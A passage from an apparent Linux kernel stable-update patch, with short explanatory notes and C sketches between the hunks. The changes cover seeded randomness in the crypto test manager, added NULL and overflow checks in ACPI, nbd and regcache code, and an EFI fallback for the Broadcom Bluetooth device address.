+ 	/* Data */
+-	vec->psize = generate_random_length(maxdatasize);
+-	generate_random_bytes((u8 *)vec->plaintext, vec->psize);
++	vec->psize = generate_random_length(rng, maxdatasize);
++	generate_random_bytes(rng, (u8 *)vec->plaintext, vec->psize);
+ 
+ 	/*
+ 	 * Key: length in range [1, maxkeysize], but usually choose maxkeysize.
+@@ -1652,9 +1699,9 @@ static void generate_random_hash_testvec(struct shash_desc *desc,
+ 	vec->ksize = 0;
+ 	if (maxkeysize) {
+ 		vec->ksize = maxkeysize;
+-		if (prandom_u32_max(4) == 0)
+-			vec->ksize = 1 + prandom_u32_max(maxkeysize);
+-		generate_random_bytes((u8 *)vec->key, vec->ksize);
++		if (prandom_u32_below(rng, 4) == 0)
++			vec->ksize = prandom_u32_inclusive(rng, 1, maxkeysize);
++		generate_random_bytes(rng, (u8 *)vec->key, vec->ksize);
+ 
+ 		vec->setkey_error = crypto_shash_setkey(desc->tfm, vec->key,
+ 							vec->ksize);
+@@ -1688,6 +1735,7 @@ static int test_hash_vs_generic_impl(const char *generic_driver,
+ 	const unsigned int maxdatasize = (2 * PAGE_SIZE) - TESTMGR_POISON_LEN;
+ 	const char *algname = crypto_hash_alg_common(tfm)->base.cra_name;
+ 	const char *driver = crypto_ahash_driver_name(tfm);
++	struct rnd_state rng;
+ 	char _generic_driver[CRYPTO_MAX_ALG_NAME];
+ 	struct crypto_shash *generic_tfm = NULL;
+ 	struct shash_desc *generic_desc = NULL;
+@@ -1701,6 +1749,8 @@ static int test_hash_vs_generic_impl(const char *generic_driver,
+ 	if (noextratests)
+ 		return 0;
+ 
++	init_rnd_state(&rng);
++
+ 	if (!generic_driver) { /* Use default naming convention? */
+ 		err = build_generic_driver_name(algname, _generic_driver);
+ 		if (err)
+@@ -1769,10 +1819,11 @@ static int test_hash_vs_generic_impl(const char *generic_driver,
+ 	}
+ 
+ 	for (i = 0; i < fuzz_iterations * 8; i++) {
+-		generate_random_hash_testvec(generic_desc, &vec,
++		generate_random_hash_testvec(&rng, generic_desc, &vec,
+ 					     maxkeysize, maxdatasize,
+ 					     vec_name, sizeof(vec_name));
+-		generate_random_testvec_config(cfg, cfgname, sizeof(cfgname));
++		generate_random_testvec_config(&rng, cfg, cfgname,
++					       sizeof(cfgname));
+ 
+ 		err = test_hash_vec_cfg(&vec, vec_name, cfg,
+ 					req, desc, tsgl, hashstate);
+@@ -2174,11 +2225,14 @@ static int test_aead_vec(int enc, const struct aead_testvec *vec,
+ 
+ #ifdef CONFIG_CRYPTO_MANAGER_EXTRA_TESTS
+ 	if (!noextratests) {
++		struct rnd_state rng;
+ 		struct testvec_config cfg;
+ 		char cfgname[TESTVEC_CONFIG_NAMELEN];
+ 
++		init_rnd_state(&rng);
++
+ 		for (i = 0; i < fuzz_iterations; i++) {
+-			generate_random_testvec_config(&cfg, cfgname,
++			generate_random_testvec_config(&rng, &cfg, cfgname,
+ 						       sizeof(cfgname));
+ 			err = test_aead_vec_cfg(enc, vec, vec_name,
+ 						&cfg, req, tsgls);
+@@ -2194,6 +2248,7 @@ static int test_aead_vec(int enc, const struct aead_testvec *vec,
+ #ifdef CONFIG_CRYPTO_MANAGER_EXTRA_TESTS
+ 
+ struct aead_extra_tests_ctx {
++	struct rnd_state rng;
+ 	struct aead_request *req;
+ 	struct crypto_aead *tfm;
+ 	const struct alg_test_desc *test_desc;
+@@ -2212,24 +2267,26 @@ struct aead_extra_tests_ctx {
+  * here means the full ciphertext including the authentication tag.  The
+  * authentication tag (and hence also the ciphertext) is assumed to be nonempty.
+  */
+-static void mutate_aead_message(struct aead_testvec *vec, bool aad_iv,
++static void mutate_aead_message(struct rnd_state *rng,
++				struct aead_testvec *vec, bool aad_iv,
+ 				unsigned int ivsize)
+ {
+ 	const unsigned int aad_tail_size = aad_iv ? ivsize : 0;
+ 	const unsigned int authsize = vec->clen - vec->plen;
+ 
+-	if (prandom_u32_max(2) == 0 && vec->alen > aad_tail_size) {
++	if (prandom_bool(rng) && vec->alen > aad_tail_size) {
+ 		 /* Mutate the AAD */
+-		flip_random_bit((u8 *)vec->assoc, vec->alen - aad_tail_size);
+-		if (prandom_u32_max(2) == 0)
++		flip_random_bit(rng, (u8 *)vec->assoc,
++				vec->alen - aad_tail_size);
++		if (prandom_bool(rng))
+ 			return;
+ 	}
+-	if (prandom_u32_max(2) == 0) {
++	if (prandom_bool(rng)) {
+ 		/* Mutate auth tag (assuming it's at the end of ciphertext) */
+-		flip_random_bit((u8 *)vec->ctext + vec->plen, authsize);
++		flip_random_bit(rng, (u8 *)vec->ctext + vec->plen, authsize);
+ 	} else {
+ 		/* Mutate any part of the ciphertext */
+-		flip_random_bit((u8 *)vec->ctext, vec->clen);
++		flip_random_bit(rng, (u8 *)vec->ctext, vec->clen);
+ 	}
+ }
+ 
+@@ -2240,7 +2297,8 @@ static void mutate_aead_message(struct aead_testvec *vec, bool aad_iv,
+  */
+ #define MIN_COLLISION_FREE_AUTHSIZE 8
+ 
+-static void generate_aead_message(struct aead_request *req,
++static void generate_aead_message(struct rnd_state *rng,
++				  struct aead_request *req,
+ 				  const struct aead_test_suite *suite,
+ 				  struct aead_testvec *vec,
+ 				  bool prefer_inauthentic)
+@@ -2249,17 +2307,18 @@ static void generate_aead_message(struct aead_request *req,
+ 	const unsigned int ivsize = crypto_aead_ivsize(tfm);
+ 	const unsigned int authsize = vec->clen - vec->plen;
+ 	const bool inauthentic = (authsize >= MIN_COLLISION_FREE_AUTHSIZE) &&
+-				 (prefer_inauthentic || prandom_u32_max(4) == 0);
++				 (prefer_inauthentic ||
++				  prandom_u32_below(rng, 4) == 0);
+ 
+ 	/* Generate the AAD. */
+-	generate_random_bytes((u8 *)vec->assoc, vec->alen);
++	generate_random_bytes(rng, (u8 *)vec->assoc, vec->alen);
+ 	if (suite->aad_iv && vec->alen >= ivsize)
+ 		/* Avoid implementation-defined behavior. */
+ 		memcpy((u8 *)vec->assoc + vec->alen - ivsize, vec->iv, ivsize);
+ 
+-	if (inauthentic && prandom_u32_max(2) == 0) {
++	if (inauthentic && prandom_bool(rng)) {
+ 		/* Generate a random ciphertext. */
+-		generate_random_bytes((u8 *)vec->ctext, vec->clen);
++		generate_random_bytes(rng, (u8 *)vec->ctext, vec->clen);
+ 	} else {
+ 		int i = 0;
+ 		struct scatterlist src[2], dst;
+@@ -2271,7 +2330,7 @@ static void generate_aead_message(struct aead_request *req,
+ 		if (vec->alen)
+ 			sg_set_buf(&src[i++], vec->assoc, vec->alen);
+ 		if (vec->plen) {
+-			generate_random_bytes((u8 *)vec->ptext, vec->plen);
++			generate_random_bytes(rng, (u8 *)vec->ptext, vec->plen);
+ 			sg_set_buf(&src[i++], vec->ptext, vec->plen);
+ 		}
+ 		sg_init_one(&dst, vec->ctext, vec->alen + vec->clen);
+@@ -2291,7 +2350,7 @@ static void generate_aead_message(struct aead_request *req,
+ 		 * Mutate the authentic (ciphertext, AAD) pair to get an
+ 		 * inauthentic one.
+ 		 */
+-		mutate_aead_message(vec, suite->aad_iv, ivsize);
++		mutate_aead_message(rng, vec, suite->aad_iv, ivsize);
+ 	}
+ 	vec->novrfy = 1;
+ 	if (suite->einval_allowed)
+@@ -2305,7 +2364,8 @@ static void generate_aead_message(struct aead_request *req,
+  * If 'prefer_inauthentic' is true, then this function will generate inauthentic
+  * test vectors (i.e. vectors with 'vec->novrfy=1') more often.
+  */
+-static void generate_random_aead_testvec(struct aead_request *req,
++static void generate_random_aead_testvec(struct rnd_state *rng,
++					 struct aead_request *req,
+ 					 struct aead_testvec *vec,
+ 					 const struct aead_test_suite *suite,
+ 					 unsigned int maxkeysize,
+@@ -2321,18 +2381,18 @@ static void generate_random_aead_testvec(struct aead_request *req,
+ 
+ 	/* Key: length in [0, maxkeysize], but usually choose maxkeysize */
+ 	vec->klen = maxkeysize;
+-	if (prandom_u32_max(4) == 0)
+-		vec->klen = prandom_u32_max(maxkeysize + 1);
+-	generate_random_bytes((u8 *)vec->key, vec->klen);
++	if (prandom_u32_below(rng, 4) == 0)
++		vec->klen = prandom_u32_below(rng, maxkeysize + 1);
++	generate_random_bytes(rng, (u8 *)vec->key, vec->klen);
+ 	vec->setkey_error = crypto_aead_setkey(tfm, vec->key, vec->klen);
+ 
+ 	/* IV */
+-	generate_random_bytes((u8 *)vec->iv, ivsize);
++	generate_random_bytes(rng, (u8 *)vec->iv, ivsize);
+ 
+ 	/* Tag length: in [0, maxauthsize], but usually choose maxauthsize */
+ 	authsize = maxauthsize;
+-	if (prandom_u32_max(4) == 0)
+-		authsize = prandom_u32_max(maxauthsize + 1);
++	if (prandom_u32_below(rng, 4) == 0)
++		authsize = prandom_u32_below(rng, maxauthsize + 1);
+ 	if (prefer_inauthentic && authsize < MIN_COLLISION_FREE_AUTHSIZE)
+ 		authsize = MIN_COLLISION_FREE_AUTHSIZE;
+ 	if (WARN_ON(authsize > maxdatasize))
+@@ -2341,11 +2401,11 @@ static void generate_random_aead_testvec(struct aead_request *req,
+ 	vec->setauthsize_error = crypto_aead_setauthsize(tfm, authsize);
+ 
+ 	/* AAD, plaintext, and ciphertext lengths */
+-	total_len = generate_random_length(maxdatasize);
+-	if (prandom_u32_max(4) == 0)
++	total_len = generate_random_length(rng, maxdatasize);
++	if (prandom_u32_below(rng, 4) == 0)
+ 		vec->alen = 0;
+ 	else
+-		vec->alen = generate_random_length(total_len);
++		vec->alen = generate_random_length(rng, total_len);
+ 	vec->plen = total_len - vec->alen;
+ 	vec->clen = vec->plen + authsize;
+ 
+@@ -2356,7 +2416,7 @@ static void generate_random_aead_testvec(struct aead_request *req,
+ 	vec->novrfy = 0;
+ 	vec->crypt_error = 0;
+ 	if (vec->setkey_error == 0 && vec->setauthsize_error == 0)
+-		generate_aead_message(req, suite, vec, prefer_inauthentic);
++		generate_aead_message(rng, req, suite, vec, prefer_inauthentic);
+ 	snprintf(name, max_namelen,
+ 		 "\"random: alen=%u plen=%u authsize=%u klen=%u novrfy=%d\"",
+ 		 vec->alen, vec->plen, authsize, vec->klen, vec->novrfy);
+@@ -2368,7 +2428,7 @@ static void try_to_generate_inauthentic_testvec(
+ 	int i;
+ 
+ 	for (i = 0; i < 10; i++) {
+-		generate_random_aead_testvec(ctx->req, &ctx->vec,
++		generate_random_aead_testvec(&ctx->rng, ctx->req, &ctx->vec,
+ 					     &ctx->test_desc->suite.aead,
+ 					     ctx->maxkeysize, ctx->maxdatasize,
+ 					     ctx->vec_name,
+@@ -2399,7 +2459,8 @@ static int test_aead_inauthentic_inputs(struct aead_extra_tests_ctx *ctx)
+ 		 */
+ 		try_to_generate_inauthentic_testvec(ctx);
+ 		if (ctx->vec.novrfy) {
+-			generate_random_testvec_config(&ctx->cfg, ctx->cfgname,
++			generate_random_testvec_config(&ctx->rng, &ctx->cfg,
++						       ctx->cfgname,
+ 						       sizeof(ctx->cfgname));
+ 			err = test_aead_vec_cfg(DECRYPT, &ctx->vec,
+ 						ctx->vec_name, &ctx->cfg,
+@@ -2489,12 +2550,13 @@ static int test_aead_vs_generic_impl(struct aead_extra_tests_ctx *ctx)
+ 	 * the other implementation against them.
+ 	 */
+ 	for (i = 0; i < fuzz_iterations * 8; i++) {
+-		generate_random_aead_testvec(generic_req, &ctx->vec,
++		generate_random_aead_testvec(&ctx->rng, generic_req, &ctx->vec,
+ 					     &ctx->test_desc->suite.aead,
+ 					     ctx->maxkeysize, ctx->maxdatasize,
+ 					     ctx->vec_name,
+ 					     sizeof(ctx->vec_name), false);
+-		generate_random_testvec_config(&ctx->cfg, ctx->cfgname,
++		generate_random_testvec_config(&ctx->rng, &ctx->cfg,
++					       ctx->cfgname,
+ 					       sizeof(ctx->cfgname));
+ 		if (!ctx->vec.novrfy) {
+ 			err = test_aead_vec_cfg(ENCRYPT, &ctx->vec,
+@@ -2533,6 +2595,7 @@ static int test_aead_extra(const struct alg_test_desc *test_desc,
+ 	ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
+ 	if (!ctx)
+ 		return -ENOMEM;
++	init_rnd_state(&ctx->rng);
+ 	ctx->req = req;
+ 	ctx->tfm = crypto_aead_reqtfm(req);
+ 	ctx->test_desc = test_desc;
+@@ -2922,11 +2985,14 @@ static int test_skcipher_vec(int enc, const struct cipher_testvec *vec,
+ 
+ #ifdef CONFIG_CRYPTO_MANAGER_EXTRA_TESTS
+ 	if (!noextratests) {
++		struct rnd_state rng;
+ 		struct testvec_config cfg;
+ 		char cfgname[TESTVEC_CONFIG_NAMELEN];
+ 
++		init_rnd_state(&rng);
++
+ 		for (i = 0; i < fuzz_iterations; i++) {
+-			generate_random_testvec_config(&cfg, cfgname,
++			generate_random_testvec_config(&rng, &cfg, cfgname,
+ 						       sizeof(cfgname));
+ 			err = test_skcipher_vec_cfg(enc, vec, vec_name,
+ 						    &cfg, req, tsgls);
+@@ -2944,7 +3010,8 @@ static int test_skcipher_vec(int enc, const struct cipher_testvec *vec,
+  * Generate a symmetric cipher test vector from the given implementation.
+  * Assumes the buffers in 'vec' were already allocated.
+  */
+-static void generate_random_cipher_testvec(struct skcipher_request *req,
++static void generate_random_cipher_testvec(struct rnd_state *rng,
++					   struct skcipher_request *req,
+ 					   struct cipher_testvec *vec,
+ 					   unsigned int maxdatasize,
+ 					   char *name, size_t max_namelen)
+@@ -2958,17 +3025,17 @@ static void generate_random_cipher_testvec(struct skcipher_request *req,
+ 
+ 	/* Key: length in [0, maxkeysize], but usually choose maxkeysize */
+ 	vec->klen = maxkeysize;
+-	if (prandom_u32_max(4) == 0)
+-		vec->klen = prandom_u32_max(maxkeysize + 1);
+-	generate_random_bytes((u8 *)vec->key, vec->klen);
++	if (prandom_u32_below(rng, 4) == 0)
++		vec->klen = prandom_u32_below(rng, maxkeysize + 1);
++	generate_random_bytes(rng, (u8 *)vec->key, vec->klen);
+ 	vec->setkey_error = crypto_skcipher_setkey(tfm, vec->key, vec->klen);
+ 
+ 	/* IV */
+-	generate_random_bytes((u8 *)vec->iv, ivsize);
++	generate_random_bytes(rng, (u8 *)vec->iv, ivsize);
+ 
+ 	/* Plaintext */
+-	vec->len = generate_random_length(maxdatasize);
+-	generate_random_bytes((u8 *)vec->ptext, vec->len);
++	vec->len = generate_random_length(rng, maxdatasize);
++	generate_random_bytes(rng, (u8 *)vec->ptext, vec->len);
+ 
+ 	/* If the key couldn't be set, no need to continue to encrypt. */
+ 	if (vec->setkey_error)
+@@ -3010,6 +3077,7 @@ static int test_skcipher_vs_generic_impl(const char *generic_driver,
+ 	const unsigned int maxdatasize = (2 * PAGE_SIZE) - TESTMGR_POISON_LEN;
+ 	const char *algname = crypto_skcipher_alg(tfm)->base.cra_name;
+ 	const char *driver = crypto_skcipher_driver_name(tfm);
++	struct rnd_state rng;
+ 	char _generic_driver[CRYPTO_MAX_ALG_NAME];
+ 	struct crypto_skcipher *generic_tfm = NULL;
+ 	struct skcipher_request *generic_req = NULL;
+@@ -3027,6 +3095,8 @@ static int test_skcipher_vs_generic_impl(const char *generic_driver,
+ 	if (strncmp(algname, "kw(", 3) == 0)
+ 		return 0;
+ 
++	init_rnd_state(&rng);
++
+ 	if (!generic_driver) { /* Use default naming convention? */
+ 		err = build_generic_driver_name(algname, _generic_driver);
+ 		if (err)
+@@ -3111,9 +3181,11 @@ static int test_skcipher_vs_generic_impl(const char *generic_driver,
+ 	}
+ 
+ 	for (i = 0; i < fuzz_iterations * 8; i++) {
+-		generate_random_cipher_testvec(generic_req, &vec, maxdatasize,
++		generate_random_cipher_testvec(&rng, generic_req, &vec,
++					       maxdatasize,
+ 					       vec_name, sizeof(vec_name));
+-		generate_random_testvec_config(cfg, cfgname, sizeof(cfgname));
++		generate_random_testvec_config(&rng, cfg, cfgname,
++					       sizeof(cfgname));
+ 
+ 		err = test_skcipher_vec_cfg(ENCRYPT, &vec, vec_name,
+ 					    cfg, req, tsgls);
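
The testmgr.c hunks above thread a caller-owned struct rnd_state through every random helper, so each fuzz pass draws from its own seeded generator rather than the global entropy pool, and a failing configuration can be replayed from its seed. A rough userspace sketch of the same idea follows; the xorshift generator and the rng_* helper names are inventions for illustration, not the kernel's prandom implementation, and the modulo reduction is deliberately naive.

#include <stdint.h>
#include <stdio.h>

/* Tiny seedable PRNG (xorshift32) standing in for struct rnd_state. */
struct rng_state { uint32_t s; };

static void rng_seed(struct rng_state *rng, uint32_t seed)
{
        rng->s = seed ? seed : 1;       /* xorshift must not start at 0 */
}

static uint32_t rng_u32(struct rng_state *rng)
{
        uint32_t x = rng->s;

        x ^= x << 13;
        x ^= x >> 17;
        x ^= x << 5;
        return rng->s = x;
}

/* Uniform value in [0, ceil), like prandom_u32_below() in the patch
 * (the real helper avoids the modulo bias accepted here). */
static uint32_t rng_u32_below(struct rng_state *rng, uint32_t ceil)
{
        return rng_u32(rng) % ceil;
}

/* Inclusive range [floor, ceil], like prandom_u32_inclusive(). */
static uint32_t rng_u32_inclusive(struct rng_state *rng,
                                  uint32_t floor, uint32_t ceil)
{
        return floor + rng_u32_below(rng, ceil - floor + 1);
}

int main(void)
{
        struct rng_state rng;
        int i;

        /* Same seed => same "random" test case, which is what makes a
         * fuzz failure reproducible from its logged seed. */
        rng_seed(&rng, 0x12345678);
        for (i = 0; i < 4; i++)
                printf("len=%u\n", rng_u32_inclusive(&rng, 1, 128));
        return 0;
}
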
+diff --git a/drivers/acpi/acpi_apd.c b/drivers/acpi/acpi_apd.c
+index 3bbe2276cac76..80f945cbec8a7 100644
+--- a/drivers/acpi/acpi_apd.c
++++ b/drivers/acpi/acpi_apd.c
+@@ -83,6 +83,8 @@ static int fch_misc_setup(struct apd_private_data *pdata)
+ 	if (!acpi_dev_get_property(adev, "clk-name", ACPI_TYPE_STRING, &obj)) {
+ 		clk_data->name = devm_kzalloc(&adev->dev, obj->string.length,
+ 					      GFP_KERNEL);
++		if (!clk_data->name)
++			return -ENOMEM;
+ 
+ 		strcpy(clk_data->name, obj->string.pointer);
+ 	} else {
+diff --git a/drivers/acpi/acpica/dbnames.c b/drivers/acpi/acpica/dbnames.c
+index 3615e1a6efd8a..b91155ea9c343 100644
+--- a/drivers/acpi/acpica/dbnames.c
++++ b/drivers/acpi/acpica/dbnames.c
+@@ -652,6 +652,9 @@ acpi_status acpi_db_display_objects(char *obj_type_arg, char *display_count_arg)
+ 		object_info =
+ 		    ACPI_ALLOCATE_ZEROED(sizeof(struct acpi_object_info));
+ 
++		if (!object_info)
++			return (AE_NO_MEMORY);
++
+ 		/* Walk the namespace from the root */
+ 
+ 		(void)acpi_walk_namespace(ACPI_TYPE_ANY, ACPI_ROOT_OBJECT,
+diff --git a/drivers/acpi/acpica/dswstate.c b/drivers/acpi/acpica/dswstate.c
+index 0aa735d3b93cc..77076da2029d9 100644
+--- a/drivers/acpi/acpica/dswstate.c
++++ b/drivers/acpi/acpica/dswstate.c
+@@ -576,9 +576,14 @@ acpi_ds_init_aml_walk(struct acpi_walk_state *walk_state,
+ 	ACPI_FUNCTION_TRACE(ds_init_aml_walk);
+ 
+ 	walk_state->parser_state.aml =
+-	    walk_state->parser_state.aml_start = aml_start;
+-	walk_state->parser_state.aml_end =
+-	    walk_state->parser_state.pkg_end = aml_start + aml_length;
++	    walk_state->parser_state.aml_start =
++	    walk_state->parser_state.aml_end =
++	    walk_state->parser_state.pkg_end = aml_start;
++	/* Avoid undefined behavior: applying zero offset to null pointer */
++	if (aml_length != 0) {
++		walk_state->parser_state.aml_end += aml_length;
++		walk_state->parser_state.pkg_end += aml_length;
++	}
+ 
+ 	/* The next_op of the next_walk will be the beginning of the method */
+ 
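
The dswstate.c hunk dodges a C-level trap: even NULL + 0 is undefined pointer arithmetic, which UBSAN reports, so the offsets are applied only when aml_length is nonzero. A minimal standalone illustration of the guarded form; the struct and function names here are made up.

#include <stddef.h>
#include <stdio.h>

struct parser_state {
        unsigned char *aml;
        unsigned char *aml_end;
};

/* Guarded setup: only offset the pointer when the length is nonzero,
 * so a (NULL, 0) pair never evaluates NULL + 0, which is undefined
 * behavior in C even though the offset is zero. */
static void parser_init(struct parser_state *ps, unsigned char *start,
                        size_t len)
{
        ps->aml = start;
        ps->aml_end = start;
        if (len != 0)
                ps->aml_end += len;
}

int main(void)
{
        struct parser_state ps;

        parser_init(&ps, NULL, 0);      /* safe: no pointer arithmetic */
        printf("empty stream: %d\n", ps.aml == ps.aml_end);
        return 0;
}
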
+diff --git a/drivers/acpi/ec.c b/drivers/acpi/ec.c
+index 9751b84c1b221..ee4c812c8f6cc 100644
+--- a/drivers/acpi/ec.c
++++ b/drivers/acpi/ec.c
+@@ -1121,6 +1121,7 @@ static void acpi_ec_remove_query_handlers(struct acpi_ec *ec,
+ void acpi_ec_remove_query_handler(struct acpi_ec *ec, u8 query_bit)
+ {
+ 	acpi_ec_remove_query_handlers(ec, false, query_bit);
++	flush_workqueue(ec_query_wq);
+ }
+ EXPORT_SYMBOL_GPL(acpi_ec_remove_query_handler);
+ 
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index 0556c4720d3fa..b6d429a2bcb62 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -130,12 +130,6 @@ static int video_detect_force_native(const struct dmi_system_id *d)
+ 	return 0;
+ }
+ 
+-static int video_detect_force_none(const struct dmi_system_id *d)
+-{
+-	acpi_backlight_dmi = acpi_backlight_none;
+-	return 0;
+-}
+-
+ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 	/*
+ 	 * Models which should use the vendor backlight interface,
+@@ -752,35 +746,6 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "Vostro 15 3535"),
+ 		},
+ 	},
+-
+-	/*
+-	 * Desktops which falsely report a backlight and which our heuristics
+-	 * for this do not catch.
+-	 */
+-	{
+-	 .callback = video_detect_force_none,
+-	 /* Dell OptiPlex 9020M */
+-	 .matches = {
+-		DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc."),
+-		DMI_MATCH(DMI_PRODUCT_NAME, "OptiPlex 9020M"),
+-		},
+-	},
+-	{
+-	 .callback = video_detect_force_none,
+-	 /* GIGABYTE GB-BXBT-2807 */
+-	 .matches = {
+-		DMI_MATCH(DMI_SYS_VENDOR, "GIGABYTE"),
+-		DMI_MATCH(DMI_PRODUCT_NAME, "GB-BXBT-2807"),
+-		},
+-	},
+-	{
+-	 .callback = video_detect_force_none,
+-	 /* MSI MS-7721 */
+-	 .matches = {
+-		DMI_MATCH(DMI_SYS_VENDOR, "MSI"),
+-		DMI_MATCH(DMI_PRODUCT_NAME, "MS-7721"),
+-		},
+-	},
+ 	{ },
+ };
+ 
+diff --git a/drivers/base/platform.c b/drivers/base/platform.c
+index 51bb2289865c7..3a06c214ca1c6 100644
+--- a/drivers/base/platform.c
++++ b/drivers/base/platform.c
+@@ -1416,7 +1416,9 @@ static void platform_remove(struct device *_dev)
+ 	struct platform_driver *drv = to_platform_driver(_dev->driver);
+ 	struct platform_device *dev = to_platform_device(_dev);
+ 
+-	if (drv->remove) {
++	if (drv->remove_new) {
++		drv->remove_new(dev);
++	} else if (drv->remove) {
+ 		int ret = drv->remove(dev);
+ 
+ 		if (ret)
+diff --git a/drivers/base/regmap/regcache.c b/drivers/base/regmap/regcache.c
+index 362e043e26d86..8031007b4887d 100644
+--- a/drivers/base/regmap/regcache.c
++++ b/drivers/base/regmap/regcache.c
+@@ -349,6 +349,9 @@ int regcache_sync(struct regmap *map)
+ 	const char *name;
+ 	bool bypass;
+ 
++	if (WARN_ON(map->cache_type == REGCACHE_NONE))
++		return -EINVAL;
++
+ 	BUG_ON(!map->cache_ops);
+ 
+ 	map->lock(map->lock_arg);
+@@ -418,6 +421,9 @@ int regcache_sync_region(struct regmap *map, unsigned int min,
+ 	const char *name;
+ 	bool bypass;
+ 
++	if (WARN_ON(map->cache_type == REGCACHE_NONE))
++		return -EINVAL;
++
+ 	BUG_ON(!map->cache_ops);
+ 
+ 	map->lock(map->lock_arg);
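
Both regcache hunks lean on the kernel idiom that WARN_ON() evaluates to its condition, so a misuse can be logged and rejected in a single line. A hedged userspace approximation; the statement-expression macro is a GNU C extension (as in the kernel itself) and the names are illustrative.

#include <stdio.h>

/* Userspace stand-in for the kernel's WARN_ON(), which yields the
 * condition's value so it can gate an early return in one line. */
#define WARN_ON(cond) \
        ({ int __c = !!(cond); \
           if (__c) \
                fprintf(stderr, "WARNING at %s:%d\n", __FILE__, __LINE__); \
           __c; })

enum cache_type { CACHE_NONE, CACHE_RBTREE };

static int cache_sync(enum cache_type type)
{
        /* Log once and fail fast on a configuration that can't work. */
        if (WARN_ON(type == CACHE_NONE))
                return -1;      /* -EINVAL in the kernel */

        return 0;               /* ... perform the sync ... */
}

int main(void)
{
        printf("sync: %d\n", cache_sync(CACHE_NONE));
        return 0;
}
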
+diff --git a/drivers/block/nbd.c b/drivers/block/nbd.c
+index e379ccc63c520..888a6abb50f53 100644
+--- a/drivers/block/nbd.c
++++ b/drivers/block/nbd.c
+@@ -325,6 +325,9 @@ static int nbd_set_size(struct nbd_device *nbd, loff_t bytesize,
+ 	if (blk_validate_block_size(blksize))
+ 		return -EINVAL;
+ 
++	if (bytesize < 0)
++		return -EINVAL;
++
+ 	nbd->config->bytesize = bytesize;
+ 	nbd->config->blksize_bits = __ffs(blksize);
+ 
+@@ -1110,6 +1113,9 @@ static int nbd_add_socket(struct nbd_device *nbd, unsigned long arg,
+ 	struct nbd_sock *nsock;
+ 	int err;
+ 
++	/* Arg will be cast to int, check it to avoid overflow */
++	if (arg > INT_MAX)
++		return -EINVAL;
+ 	sock = nbd_get_socket(nbd, arg, &err);
+ 	if (!sock)
+ 		return err;
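
Both nbd.c checks apply the same rule: validate a user-controlled wide integer before it is narrowed (bytesize as a signed size, arg before being cast down to an int socket descriptor). A small sketch of the truncation check; set_socket() and its error values are stand-ins, not the driver's code.

#include <limits.h>
#include <stdio.h>

/* Hypothetical ioctl-style handler: the argument arrives as an
 * unsigned long but is consumed downstream as a plain int (for nbd,
 * a socket file descriptor), so reject anything that would wrap. */
static int set_socket(unsigned long arg)
{
        if (arg > INT_MAX)
                return -1;      /* -EINVAL in the kernel */

        printf("using fd %d\n", (int)arg);
        return 0;
}

int main(void)
{
        set_socket(3);                                  /* accepted */
        if (set_socket((unsigned long)INT_MAX + 1))
                printf("oversized fd rejected\n");
        return 0;
}
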
+diff --git a/drivers/block/null_blk/main.c b/drivers/block/null_blk/main.c
+index af419af9a0f4a..c45d09a9a9421 100644
+--- a/drivers/block/null_blk/main.c
++++ b/drivers/block/null_blk/main.c
+@@ -1945,6 +1945,11 @@ static int null_init_tag_set(struct nullb *nullb, struct blk_mq_tag_set *set)
+ 
+ static int null_validate_conf(struct nullb_device *dev)
+ {
++	if (dev->queue_mode == NULL_Q_RQ) {
++		pr_err("legacy IO path is no longer available\n");
++		return -EINVAL;
++	}
++
+ 	dev->blocksize = round_down(dev->blocksize, 512);
+ 	dev->blocksize = clamp_t(unsigned int, dev->blocksize, 512, 4096);
+ 
+diff --git a/drivers/bluetooth/btbcm.c b/drivers/bluetooth/btbcm.c
+index 43e98a598bd9a..de2ea589aa49b 100644
+--- a/drivers/bluetooth/btbcm.c
++++ b/drivers/bluetooth/btbcm.c
+@@ -6,6 +6,7 @@
+  *  Copyright (C) 2015  Intel Corporation
+  */
+ 
++#include <linux/efi.h>
+ #include <linux/module.h>
+ #include <linux/firmware.h>
+ #include <linux/dmi.h>
+@@ -34,6 +35,43 @@
+ /* For kmalloc-ing the fw-name array instead of putting it on the stack */
+ typedef char bcm_fw_name[BCM_FW_NAME_LEN];
+ 
++#ifdef CONFIG_EFI
++static int btbcm_set_bdaddr_from_efi(struct hci_dev *hdev)
++{
++	efi_guid_t guid = EFI_GUID(0x74b00bd9, 0x805a, 0x4d61, 0xb5, 0x1f,
++				   0x43, 0x26, 0x81, 0x23, 0xd1, 0x13);
++	bdaddr_t efi_bdaddr, bdaddr;
++	efi_status_t status;
++	unsigned long len;
++	int ret;
++
++	if (!efi_rt_services_supported(EFI_RT_SUPPORTED_GET_VARIABLE))
++		return -EOPNOTSUPP;
++
++	len = sizeof(efi_bdaddr);
++	status = efi.get_variable(L"BDADDR", &guid, NULL, &len, &efi_bdaddr);
++	if (status != EFI_SUCCESS)
++		return -ENXIO;
++
++	if (len != sizeof(efi_bdaddr))
++		return -EIO;
++
++	baswap(&bdaddr, &efi_bdaddr);
++
++	ret = btbcm_set_bdaddr(hdev, &bdaddr);
++	if (ret)
++		return ret;
++
++	bt_dev_info(hdev, "BCM: Using EFI device address (%pMR)", &bdaddr);
++	return 0;
++}
++#else
++static int btbcm_set_bdaddr_from_efi(struct hci_dev *hdev)
++{
++	return -EOPNOTSUPP;
++}
++#endif
++
+ int btbcm_check_bdaddr(struct hci_dev *hdev)
+ {
+ 	struct hci_rp_read_bd_addr *bda;
+@@ -87,9 +125,12 @@ int btbcm_check_bdaddr(struct hci_dev *hdev)
+ 	    !bacmp(&bda->bdaddr, BDADDR_BCM4345C5) ||
+ 	    !bacmp(&bda->bdaddr, BDADDR_BCM43430A0) ||
+ 	    !bacmp(&bda->bdaddr, BDADDR_BCM43341B)) {
+-		bt_dev_info(hdev, "BCM: Using default device address (%pMR)",
+-			    &bda->bdaddr);
+-		set_bit(HCI_QUIRK_INVALID_BDADDR, &hdev->quirks);
++		/* Try falling back to BDADDR EFI variable */
++		if (btbcm_set_bdaddr_from_efi(hdev) != 0) {
++			bt_dev_info(hdev, "BCM: Using default device address (%pMR)",
++				    &bda->bdaddr);
++			set_bit(HCI_QUIRK_INVALID_BDADDR, &hdev->quirks);
++		}
+ 	}
+ 
+ 	kfree_skb(skb);
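
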